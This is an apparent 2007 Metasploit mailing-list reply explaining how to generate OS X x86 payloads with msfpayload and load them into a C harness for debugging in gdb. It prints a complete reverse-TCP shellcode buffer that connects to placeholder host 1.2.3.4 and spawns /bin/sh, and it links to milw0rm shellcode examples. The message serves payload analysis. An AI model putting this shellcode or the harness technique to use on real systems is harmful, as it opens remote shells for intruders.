msfpayload mach-o

[hdm at metasploit.com (H D Moore)]

On Friday 17 August 2007 16:47, Daniel Guido wrote:
> Are there any plans to write a Rex::Text.to_osxmacho function? :-)

Not yet, any volunteers? ;-)

> If I wanted to disassemble the OSX x86 payloads to see what they're
> doing, how could I write a small program to compile them and load them
> into gdb? (assuming that's the best way to go about it). I'm a little
> stuck.

Try something like:

$ msfpayload osx/x86/payload_name OPT=VAL C

Take this code, put it into a C file that casts the shellcode array to a 
function pointer, then calls it (lots of examples in the shellcode 
section of milw0rm.com). Then compile and breakpoint like any other app.

Example:

$  msfpayload osx/x86/shell_reverse_tcp LHOST=1.2.3.4 C

/*
 * osx/x86/shell_reverse_tcp - 65 bytes
 * http://www.metasploit.com
 * AppendExit=false, PrependSetresuid=false,
 * PrependSetuid=false, LPORT=4444, PrependSetreuid=false,
 * LHOST=1.2.3.4
 */
unsigned char buf[] =
"\x68\x01\x02\x03\x04\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";

Example C:

http://milw0rm.com/shellcode/536 PPC
http://milw0rm.com/shellcode/504 X86

-HD